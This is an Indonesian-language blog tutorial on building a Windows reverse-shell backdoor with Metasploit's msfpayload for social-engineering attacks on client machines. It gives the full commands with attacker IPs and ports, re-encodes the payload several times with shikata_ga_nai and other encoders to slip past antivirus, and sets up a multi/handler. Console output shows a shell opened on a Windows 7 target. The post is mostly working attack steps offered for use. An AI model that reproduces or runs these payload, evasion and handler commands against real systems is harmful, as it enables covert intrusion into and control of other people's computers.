Posts Subscribe comment Comments

Membuat Metasploit menyerang dari sisi Client !!!

Sebelum bobo ... kita kali ini akan belajar bagaimana membuat file yang akan kita gunakan untuk membuat serangan dari sisi client !!! teknik seperti biasanya digunakan oleh hacker dengan metode "Social Enginering".
bersama sama mari kita buka metasploit nya masing masing......
mari kita buka metaploit nya masing masing .... 


kita menggunakan tools yang bernama msfpayload :
root@whitecyber-server:/opt/framework-3.5.1/msf3# msfpayload

Kali ini kita akan membuat file pemicu yang dapat kita letakkan pada sisi client.
backdoor klo kita sering mengenalnya. kali ini kita akan mencoba membuat backdoor untuk Windows, jadi hasil keluarannya nanti berupa file exe. sebenarnya bisa jg sie kita setting keluarannya jadi perl atau c. tapi kita coba buat 1 dulu backdoornya sebelum bobo ya.....
 
 
tulis perintah perintah dibawah ini

1. ./msfpayload windows/shell_reverse_tcp O
(kita gunakan untuk mengecek apakah module ini berjalan normal)

2. ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 O
(kita akan melakukan back connect dari ip pc kita 172.16.104.130, dan port 31337)

3. Gunakan tambahan perintah untuk membuat file backdoor 1.exe
(X > /tmp/1.exe)

./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

4. lalu kita buka file nya dengan perintah
file /tmp/1.exe

Nah selesai dech ....
Kita sudah membuat backdoor untuk windows dengan menggunakan metasploit.
Sekarang setelah seperti ini kita praktekkan langsung ya..
 
root@whitecyber-server:/opt/framework-3.5.1/msf3# msfpayload dos/windows/shell_reverse_tcp 0
Invalid payload: dos/windows/shell_reverse_tcp
root@whitecyber-server:/opt/framework-3.5.1/msf3# msfpayload windows/shell_reverse_tcp 0
root@whitecybe...r-server:/opt/framework-3.5.1/msf3# msfpayload windows/shell_reverse_tcp 0
root@whitecyber-server:/opt/framework-3.5.1/msf3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 O




Name: Windows Command Shell, Reverse TCP Inline



Version: 8642
Platform: Windows



Arch: x86
Needs Admin: No
Total size: 314



Rank: Normal

Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 172.16.104.130 yes The listen address
LPORT 31337 yes The listen port

Description:
Connect back to attacker and spawn a command shell

root@whitecyber-server:/opt/framework-3.5.1/msf3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Created by msfpayload (http://www.metasploit.com/).
Payload: windows/shell_reverse_tcp
Length: 314
Options: LHOST=172.16.104.130,LPORT=31337
root@whitecyber-server:/opt/framework-3.5.1/msf3# file /tmp/1.exe
/tmp/1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@whitecyber-server:/opt/framework-3.5.1/msf3#
 
kita sudah membuat backdoor untuk Versi Windows !!!


kita jg dapat membuat backdoor versi : Windows, Linux, Unix, BSD, Solaris juga .... caranya dengan menggunakan payload yang berbeda dengan cara ketik msfpayload (enter) nanti akan muncul backconnect berbagai system..

Nah terus  bagaimana cara menggunakannya..... dengan menyambungkan ke metasploitnya......???

masih terdeteksi oleh antivirus......????

kita buat lagi dengan perintah seperti ini

‎./msfpayload windows/shell_reverse_tcp LHOST=192.168.11.5 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe

root@whitecyber:/opt/framework-3.5.1/msf3# file /tmp/2.exe
/tmp/2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@whitecyber:/opt/framework-3.5.1/msf3#


nah sekarang kita coba lagi nie masukin ke windows.... kali ini saya menggunakan windows 7 sebagai target apakah masih terdetect ???

Nah sukses ....... tidak terdetect antivirus kan ......... padahal itu baru encode versi ke 2......

sekarang kita jalankan dulu backdoor yang sudah kita tanam di windows 7 tadi..

Successss....... !!!!!

kita mendapatkan rootnya windows...................................

disini ya cara masuknya..
msf > use exploit/multi/handler
msf exploit(handler) > show options

Module options:

... Name Current Setting Required Description
---- --------------- -------- -----------

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.11.5
LHOST => 192.168.11.5
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.11.5:31337
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.11.200
[*] Command shell session 1 opened (192.168.11.5:31337 -> 192.168.11.200:49258) at 2011-03-17 12:37:09 +0700

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

F:\>More? dir
More? dir
dir
'����u�G rojdir' is not recognized as an internal or external command,
operable program or batch file.

F:\>dir
 
Sebenarnya ada cara lagi untuk membaypass antivirus yaitu dengan melakukan encode 3 kali seperti ini..


‎./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe

0

Silahkan Tulis Komentar Anda ...